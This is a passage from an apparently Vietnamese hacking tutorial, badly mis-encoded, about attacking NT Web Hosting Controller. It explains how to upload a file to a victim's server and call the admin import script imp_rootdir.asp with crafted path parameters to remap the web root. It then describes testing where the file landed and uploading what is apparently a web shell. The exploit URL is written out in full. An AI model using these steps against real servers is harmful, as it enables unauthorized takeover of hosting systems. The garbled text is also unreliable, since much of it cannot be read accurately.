chuyn cỏi file ú vo th mc cha trang ch ca nn nhõn , theo mc nh nú s nm õy : C:Program FilesAdvanced CommunicationsNT Web Hosting Controllerweb ( Cỏc bn cú th thay C: bng D: , E: ) + Khi xỏc nh c chớnh xỏc a ch rựi ta s tỡm on script lm giỳp : http://[targethost]/admin/import/imp_rootdir.asp?result=1&www=C:&ftp=C:( ng dn n th mc web victim )&owwwPa th=C:&oftpPath=C:( ng dn n th mc ta va upload file ) + Cỏc bn cú th test ng dn file up lờn cú chớnh xỏc khụng bng cỏch up lờn file a.html bt k , gi s nú c up lờn nm C:Program FilesAdvanced CommunicationsNT Web Hosting Controllerwebadmina.html ta s test bng cỏch ỏnh ng dn URL : www.victim/admin[avdadmin]/a.html + Nu nh ỳng l chớnh xỏc ri thỡ ch cn up ngh lờn l xong , .

Tài liệu cùng người dùng

Tài liệu liên quan